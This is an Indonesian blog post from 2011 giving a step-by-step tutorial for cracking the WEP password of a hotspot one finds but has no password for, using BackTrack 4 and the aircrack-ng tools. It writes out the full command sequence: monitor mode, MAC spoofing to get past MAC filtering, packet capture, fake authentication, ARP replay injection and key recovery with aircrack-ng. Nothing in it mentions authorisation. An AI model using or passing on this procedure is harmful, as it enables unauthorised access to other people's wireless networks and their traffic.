Blognya Orang GOBLOK

Blognya orang GOBLOk yang pengen pinter,hanya sebagai koleksi pribadi yang isinya di ambil dari berbagai sumber dan sebagai tempat belajar buat saya pribadi.

Tuesday, January 18, 2011

Cara Hacking Password WLAN / Hotspot enskripsi WEP Dengan Backtrackb 4



WLAN / Hotspot sekarang bukan menjadi hal yang asing lagi bagi pengguna laptop, namun ada kalanya kita menemukan hotspot akan tetapi ketika mencoba konek kita dimintai password, nah dibawah ini ada tutorial yang
bermanfaat bagi anda untuk mencoba membuka password hotspot :
cara ini berlaku hanya untuk hotspot yang ber-enskripsi WEP 

Sebelumnya mari kita siapkan Device dan software yang dibutuhkan :
- Komputer
untuk komputer bisa laptop ataupun desktop

- USB Wireless device card
mengapa menggunakan USB??? nah begini untuk menggunakan feature dari Back Track 4 (selanjutnya disingkat BT4) kita membutuhkan device yang kompatible, walaupun USB Wireless card-pun ada yang tidak support untuk program spionase fasilitas dari BT4 silahkan lihat daftar USB yang kompatible disini.

namun saya sarankan untuk membeli USB device yang mereknya ALFA seri AWUS036H harganya kisaran $20 yang menggunakan chipset RTL8187 (walaupun hampir semua jenis ALFA menggunakan chipset tersebut).

- Backtrack Live CD
download disini BT4 (versi terbarunya BT4 R1 support alfa AWUS050) merupakan salah satu distro linux yang memang didesain untuk memudahkan dalam analisis jaringan wireles. gunakan BT live cd bagi anda yang tidak mau meng-install linux tersebut kedalam komputer. yaitu dengan  cara booting via CD. atau kita bisa menggunakan software Virtual Machine Player yang akan dijelaskan pada point selanjutnya

- Virtual Machine Player ( VMware Player )
yaitu sebuah software yang me-emulasi mesin komputer secara virtual, kita dapat mengunduhVirtual Machine Player (VMware Player) download disini selanjutnya download Image BT4 yang dikhususkan untuk VMPlayer disini

- Akses Point berenskripsi WEP
Akses point atau hotspot yang terenskripsi WEP

Memulai Hacking
Setelah kita siapkan semuanya, selanjutnya boot BT4 Live CD atau bagi yang memakai VMware Player jalankan file image BT4 dengan cara didoble klik. setelah masuk di BT ketikan Username : root dan password toor untuk live CD biasanya tidak dimintai password

1. ketik strartx untuk mulai menjalankan BT4 versi desktop

2. Mengetahui nama interface kita :
caranya buka shell konsole baru (klik icon yang berada disebelah kanan icon menu atau tombol start istilah di-windows-nya) lalu ketikan :
airmon-ng
 nanti akan muncul tulisan :
Interface     Chipset      Driver
wlan0         RTL8187  RTL
nah berarti kita sudah mengetahui nama interface kita yaitu wlan0, nama interface tersebut berbeda-beda tergantung chipsetnya.

3. mengganti mac address kita ( Bisa dilewati tahapan ini ) :
Buka shell konsol baru lalu ketik :
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
nanti akan muncul tulisan :


Sebenarnya kita tidak diharuskan mengganti MAC Address wlan card kita, dan memang saya rekomendasikan untuk melewati saja tahapan penggantian mac changer jadi anda bisa melewati tahap 3 ini. namun bagi anda yang beralasan demi keamanan, ganti saja. penggantian MAC Address tersebut hanyalah tipuan software saja adapun mac fisiknya tetap tidak berubah

4. Mencari Access Point (AP) / Hotspot
caranya buka shell konsole baru (klik icon yang berada disebelah kanan icon menu atau tombol start istilah di-windows-nya) lalu ketikan :
airodump-ng (interface)
Contoh :
airodump-ng wlan0
dan setelah program berjalan maka akan muncul beberapa nama hotspot beserta security-nya contohnya seperti ini :



setelah kita mendapatkan semua Access Point tekan tombol CTRL + C untuk menghentikan prosesnya.
disitu ditampilkan BSSID, Channel, Enkripsi dan ESSID.

5. Mengcapture Data
caranya buka shell konsole baru (klik icon yang berada disebelah kanan icon menu atau tombol start istilah di-windows-nya) lalu ketikan :

airodump-ng -w filename -c channel --bssid BSSID Interface

filename bisa diganti sesuai keinginan anda
Cannel adalah chanel yang digunakan broadcastnya hotspot
Interface yaitu interface yang digunakan
seperti contoh sebagai berikut :

airodump-ng -w yoyo -c 3 --bssid 80:23:69:BB:2D0F wlan0
6. Mencoba Autentifikasi
Autentifikasi berguna untuk mencoba injeksi data ke AP 
caranya buka shell konsole baru (klik icon yang berada disebelah kanan icon menu atau tombol start istilah di-windows-nya) lalu ketikan :
aireplay-ng -1 0 -a bssid interface
contoh :
aireplay-ng -1 0 -a 80:23:69:BB:2D0F wlan0
jika injeksi berhasil akan muncul tulisan seperti berikut :

jika tidak muncul, maka cobalah anda lebih dekat ke Akses Point untuk mendapatkan sinyal yang lebih bagus. jika masih gagal kemungkinan AP tersebut memakai MAC Filtering artinya hanya MAC address tertentu yang bisa di autentifikasi gunakan macchanger sesuaikan dengan MAC stasion yang sedang terhubung.

7. Meningkatkan Trafik Data
inti dari capturing data adalah banyaknya data yang kita capture nah perintah dibawah ini berguna untuk meningkatkan capturing datanya. Caranya buka shell konsole baru (klik icon yang berada disebelah kanan icon menu atau tombol start istilah di-windows-nya) lalu ketikan :

aireplay-ng -3 -b bssid interface
contoh :
aireplay-ng -3 -b 80:23:69:BB:2D0F wlan0
tunggu sekitar 5-15 menit dengan catatan anda dekat dengan lokasi AP dan juga pada AP terdapat client yang sedang menggunakan AP kekuatan receivernya harus lebih kecil dari -70 db walaupun terkadang -75 db masih bisa dipakai tapi memakan waktu lama. jika dua kondisi diatas tidak ditemukan maka kemungkinan  anda akan lebih lama lagi memakan waktu 2-3 jam atau bahkan lebih.
jika koneksi berhasil maka akan terlihat seperti gambar dibawah ini


8. Hacking password
lihat shell konsol yang menjalankan airodump-ng -w yoyo -c ........
lihat pada tulisan dibawah data disamping tulisan beacon jika datanya telah mencapai 5000 atau kelipatanya maka hal selanjutnya adalah kita lakukan adalah meng-enskipt password yaitu dengan membuka shell konsol baru lalu ketikan :
aircrack-ng filename*.cap
contoh :
aircrack-ng yoyo*.cap
dan hasilnya seperti berikut :

Related Post



No comments:

Post a Comment